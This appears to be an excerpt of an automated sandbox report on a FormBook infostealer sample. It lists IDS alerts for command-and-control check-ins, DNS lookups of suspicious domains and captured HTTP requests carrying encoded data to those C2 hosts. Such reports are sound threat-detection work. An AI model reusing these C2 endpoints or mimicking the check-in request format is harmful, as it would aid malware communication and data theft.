            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53230 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53184 -> 103.106.67.112:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53252 -> 94.23.162.163:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53244 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53224 -> 94.23.162.163:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53236 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53196 -> 103.106.67.112:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53248 -> 8.210.49.139:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53232 -> 209.74.64.187:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53239 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53222 -> 217.70.184.50:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.sailforever.xyz
            Source: DNS query: www.launchdreamidea.xyz
            Source: DNS query: www.030002837.xyz
            Source: DNS query: www.booosted.xyz
            Source: Joe Sandbox ViewIP Address: 209.74.64.187 209.74.64.187
            Source: Joe Sandbox ViewIP Address: 65.21.196.90 65.21.196.90
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: Joe Sandbox ViewASN Name: VOYAGERNET-AS-APVoyagerInternetLtdNZ VOYAGERNET-AS-APVoyagerInternetLtdNZ
            Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
            Source: Joe Sandbox ViewASN Name: CP-ASDE CP-ASDE
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 22 Oct 2024 20:58:17 GMTserver: Apacheset-cookie: __tad=1729630697.6660268; expires=Fri, 20-Oct-2034 20:58:17 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 582content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f db e1 c9 33 2f ac 60 32 49 38 04 1d 57 1d e4 05 57 4b 36 c8 76 a6 97 7d fe 33 b1 e8 fa 86 fc f9 03 f8 f5 28 6c 7d 9f de 4e 74 7d 46 24 7b e5 bc d8 97 72 35 c0 64 83 e2 d1 52 fc e4 6e 7a 3e 7d 5d 5c 5e 66 20 f8 be 4f c0 58 59 c7 68 ed 90 f8 cb f7 30 a4 fa 7c f2 e8 c8 c3 0c 6b 53 72 d0 e0 b1 1b 6b 7a 5d 2e af e6 b3 b9 5c bc 87 13 30 7a 00 31 6d bc 1a 03 7a bd 91 a6 31 36 0f af aa e1 09 c1 0f 2e 2f 67 c3 c3 63 9b 95 6a 0f 03 37 8f 4a e5 b8 fb e3 12 b4 d1 b8 8a 8a 4c 40 6d b1 ca 5f 33 c6 7e 20 16 51 f1 a9 51 72 07 35 5a 1c e6 55 13 da 2c 15 7c 8d 58 86 c5 b4 19 4d 65 2d 12 57 e7 ba 37 f8 bb 57 fb 3c 64 21 7e 01 75 08 3c 47 c4 c4 3c 9c ad e0 e7 ed b7 fc 95 e2 ef fc 65 bd d4 e7 1c 7c 00 43 1e fe 8b f1 07 e8 99 28 63 38 04 00 00 Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 22 Oct 2024 20:58:19 GMTserver: Apacheset-cookie: __tad=1729630699.8206090; expires=Fri, 20-Oct-2034 20:58:19 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 582content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f db e1 c9 33 2f ac 60 32 49 38 04 1d 57 1d e4 05 57 4b 36 c8 76 a6 97 7d fe 33 b1 e8 fa 86 fc f9 03 f8 f5 28 6c 7d 9f de 4e 74 7d 46 24 7b e5 bc d8 97 72 35 c0 64 83 e2 d1 52 fc e4 6e 7a 3e 7d 5d 5c 5e 66 20 f8 be 4f c0 58 59 c7 68 ed 90 f8 cb f7 30 a4 fa 7c f2 e8 c8 c3 0c 6b 53 72 d0 e0 b1 1b 6b 7a 5d 2e af e6 b3 b9 5c bc 87 13 30 7a 00 31 6d bc 1a 03 7a bd 91 a6 31 36 0f af aa e1 09 c1 0f 2e 2f 67 c3 c3 63 9b 95 6a 0f 03 37 8f 4a e5 b8 fb e3 12 b4 d1 b8 8a 8a 4c 40 6d b1 ca 5f 33 c6 7e 20 16 51 f1 a9 51 72 07 35 5a 1c e6 55 13 da 2c 15 7c 8d 58 86 c5 b4 19 4d 65 2d 12 57 e7 ba 37 f8 bb 57 fb 3c 64 21 7e 01 75 08 3c 47 c4 c4 3c 9c ad e0 e7 ed b7 fc 95 e2 ef fc 65 bd d4 e7 1c 7c 00 43 1e fe 8b f1 07 e8 99 28 63 38 04 00 00 Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 22 Oct 2024 20:58:19 GMTserver: Apacheset-cookie: __tad=1729630699.8206090; expires=Fri, 20-Oct-2034 20:58:19 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 582content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f db e1 c9 33 2f ac 60 32 49 38 04 1d 57 1d e4 05 57 4b 36 c8 76 a6 97 7d fe 33 b1 e8 fa 86 fc f9 03 f8 f5 28 6c 7d 9f de 4e 74 7d 46 24 7b e5 bc d8 97 72 35 c0 64 83 e2 d1 52 fc e4 6e 7a 3e 7d 5d 5c 5e 66 20 f8 be 4f c0 58 59 c7 68 ed 90 f8 cb f7 30 a4 fa 7c f2 e8 c8 c3 0c 6b 53 72 d0 e0 b1 1b 6b 7a 5d 2e af e6 b3 b9 5c bc 87 13 30 7a 00 31 6d bc 1a 03 7a bd 91 a6 31 36 0f af aa e1 09 c1 0f 2e 2f 67 c3 c3 63 9b 95 6a 0f 03 37 8f 4a e5 b8 fb e3 12 b4 d1 b8 8a 8a 4c 40 6d b1 ca 5f 33 c6 7e 20 16 51 f1 a9 51 72 07 35 5a 1c e6 55 13 da 2c 15 7c 8d 58 86 c5 b4 19 4d 65 2d 12 57 e7 ba 37 f8 bb 57 fb 3c 64 21 7e 01 75 08 3c 47 c4 c4 3c 9c ad e0 e7 ed b7 fc 95 e2 ef fc 65 bd d4 e7 1c 7c 00 43 1e fe 8b f1 07 e8 99 28 63 38 04 00 00 Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 22 Oct 2024 20:58:22 GMTserver: Apacheset-cookie: __tad=1729630702.4699844; expires=Fri, 20-Oct-2034 20:58:22 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 582content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f db e1 c9 33 2f ac 60 32 49 38 04 1d 57 1d e4 05 57 4b 36 c8 76 a6 97 7d fe 33 b1 e8 fa 86 fc f9 03 f8 f5 28 6c 7d 9f de 4e 74 7d 46 24 7b e5 bc d8 97 72 35 c0 64 83 e2 d1 52 fc e4 6e 7a 3e 7d 5d 5c 5e 66 20 f8 be 4f c0 58 59 c7 68 ed 90 f8 cb f7 30 a4 fa 7c f2 e8 c8 c3 0c 6b 53 72 d0 e0 b1 1b 6b 7a 5d 2e af e6 b3 b9 5c bc 87 13 30 7a 00 31 6d bc 1a 03 7a bd 91 a6 31 36 0f af aa e1 09 c1 0f 2e 2f 67 c3 c3 63 9b 95 6a 0f 03 37 8f 4a e5 b8 fb e3 12 b4 d1 b8 8a 8a 4c 40 6d b1 ca 5f 33 c6 7e 20 16 51 f1 a9 51 72 07 35 5a 1c e6 55 13 da 2c 15 7c 8d 58 86 c5 b4 19 4d 65 2d 12 57 e7 ba 37 f8 bb 57 fb 3c 64 21 7e 01 75 08 3c 47 c4 c4 3c 9c ad e0 e7 ed b7 fc 95 e2 ef fc 65 bd d4 e7 1c 7c 00 43 1e fe 8b f1 07 e8 99 28 63 38 04 00 00 Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8
            Source: global trafficHTTP traffic detected: GET /qw71/?DrelH=+N/0E0v6NJCVb805MplOCuiY6zvMpGzoX4nqdcW8deD1xdZOlnbQg5vou9xNSSthlFMWUYds/nxA/0yqGkfxHl13RnV9fZ86lxbh4XUe9xgDJH4eQTI99hcUlaXwNdeqKg==&Sx=gnM4ZH HTTP/1.1Host: www.itemsort.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /t7t4/?DrelH=JME/FbwkkQiTLR8EmPe57WZ7VagZp8tJ+vLJvTOCgHppMKWbYWfaRFz4/PgkMvknA1YharU87nKdOM/7k7q3IkusQQuIzTW/Q+d1GThbq9ZzxZjoWmxr4FVA7qWfBnIN3A==&Sx=gnM4ZH HTTP/1.1Host: www.rudemyvague.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /hshp/?DrelH=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP72R/Mt6dwrAbNlxqg3zWk6ZAL3I79JNkUMXvu17ad0+/aKhabOpL3xv01zQ1Ix9cEL3WZA==&Sx=gnM4ZH HTTP/1.1Host: www.sailforever.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bd77/?Sx=gnM4ZH&DrelH=qUcYNRi6MmsiGKriyom62ti4lIWHctjIcWj4n4RDTJ9SK0tIDWNU+4/fdEnUeQPlIjs5HOj1IjY+OoVWBoHCyUpz7x/SzvZhSZv0Dea0KcHBDKlEtGKZJ6Ek0LYLRuKiHQ== HTTP/1.1Host: www.launchdreamidea.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /t10u/?DrelH=z2kOE6Hdw1U1MLXnqmWT9va9e3/8+PVtvvr0x5hWEi4SF2SHBGm8gNhzQPXfz38/DYz+lgbjU03/S4gao0rDqDpJDn/FJZpyPS5de5f3CrWN+zQkLsrau7VMl+ksG9OKqA==&Sx=gnM4ZH HTTP/1.1Host: www.mondayigboleague.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0bvj/?Sx=gnM4ZH&DrelH=JoV24jQMdS4/3i4B5lXW6wgXe871T9Ry+Ik40cffOJE8Oz5kZb+e/LE/tYolIRko14Bt2A58ujzBN0XKB7HYk+as1PFyE+cpyOrA06AWAI1QWZMBKp1vuYqItDMniQ0DBw== HTTP/1.1Host: www.stocksm.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /v2k8/?DrelH=XThEFIcSG6Rk+ek4TZakmC+nJJjAEcvsg7f4UZ5pblIcrBlS4WXKUvIR0hCzISiZvqIQ3m6PzA/XmcrRxXtM6qnxKBkcbq4MueVVV3XCfWAmAkUYQmNwrZeqvG2HfhRonQ==&Sx=gnM4ZH HTTP/1.1Host: www.drevohome.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /1juc/?DrelH=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2+PhIDwYHX4t/HDftDJcaAUS3ArkHQTdeUPxnR6CHdkZBdIayuX0k+D8s2i/Pv/RCSFWjqZ6c9XIS2ZXqJQLcds/lvq2BX8pMITrA==&Sx=gnM4ZH HTTP/1.1Host: www.givingaway123.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qxse/?DrelH=rpts+huSPQ+pmLEcaktqX4OYLAiBGOxJ0LqkryefQtnAbXwhGMtouJAJNGxD75BBoIrDH5z7ykmTX7GRRg85P9Ge9YW+EOCG2iwxhwrHmW9o/3mDrh1ZK5nR7QXShQvwtw==&Sx=gnM4ZH HTTP/1.1Host: www.jagdud.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /y045/?Sx=gnM4ZH&DrelH=y1BC7gE5U9SjKVi4f+qVAHSx2lLKNXVMs/YJXs1dmV0xz4NUECnrQCoTHq2W+qQeH7vV4kPmjQT4fdprdSopc2q7pRx51jA4E/xrfKHMwg9y+RaF/+hNtwtULy/7l6WTkA== HTTP/1.1Host: www.030002837.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /m7sk/?DrelH=A6wDktXN+q8LbGsGA20DfX120LfCO8nuN87t6JZMO+a4oYZs/QR9AXcn2q3DsDkOv2Hc7Sq51OH+WlLaKJC80JPe0JQf+HZnvaZlGu7qv/1z0bLdCqC2RrE0forVuM7BfA==&Sx=gnM4ZH HTTP/1.1Host: www.ethetf.digitalAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /12c7/?Sx=gnM4ZH&DrelH=rkKrlAe8PM32Rlyr4yibAxDw7KGKKMI9ljR3Eqrj5cYHYbO4IgL/vCafVq76xsIWOM1RYR4h1usN6t6rhgLqOWVPblob6mrlgni+LdLmL1Exd/23ibR2hwRjCv5+3cT01Q== HTTP/1.1Host: www.booosted.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0628/?DrelH=udVPsZZaektnpNC9MvhveAugnKqjqPi3CgpOVGQRV3GxzahYZeT2u+nvI8XmYm2tQXkKvM1/LtgNko72s5T+AigTeJIoAagnD1dxA2tH0NgWMQZxZA+Ob34DrkJtsSinzg==&Sx=gnM4ZH HTTP/1.1Host: www.djazdgc.tokyoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /9vwi/?Sx=gnM4ZH&DrelH=nzAHAMVHTcHZef2dtsV+gZN2Jg+zshsJ+9OWn5ktx4T+L9EMDtm05+R8HUsMmhIjUd2KUuTNFTfuNiAYWk32ZlZ5K0mO0jPWZdMrvyGAaZ//vvCziC5VbEt1mIxURveK1Q== HTTP/1.1Host: www.productanalytics.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qw71/?DrelH=+N/0E0v6NJCVb805MplOCuiY6zvMpGzoX4nqdcW8deD1xdZOlnbQg5vou9xNSSthlFMWUYds/nxA/0yqGkfxHl13RnV9fZ86lxbh4XUe9xgDJH4eQTI99hcUlaXwNdeqKg==&Sx=gnM4ZH HTTP/1.1Host: www.itemsort.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa
            Source: global trafficDNS traffic detected: DNS query: www.itemsort.shop
            Source: global trafficDNS traffic detected: DNS query: www.rudemyvague.info
            Source: global trafficDNS traffic detected: DNS query: www.gws-treinamento2.shop
            Source: global trafficDNS traffic detected: DNS query: www.sailforever.xyz
            Source: global trafficDNS traffic detected: DNS query: www.launchdreamidea.xyz
            Source: global trafficDNS traffic detected: DNS query: www.mondayigboleague.info
            Source: global trafficDNS traffic detected: DNS query: www.stocksm.fun
            Source: global trafficDNS traffic detected: DNS query: www.drevohome.shop
            Source: global trafficDNS traffic detected: DNS query: www.givingaway123.net
            Source: global trafficDNS traffic detected: DNS query: www.jagdud.store
            Source: global trafficDNS traffic detected: DNS query: www.030002837.xyz
            Source: global trafficDNS traffic detected: DNS query: www.ethetf.digital
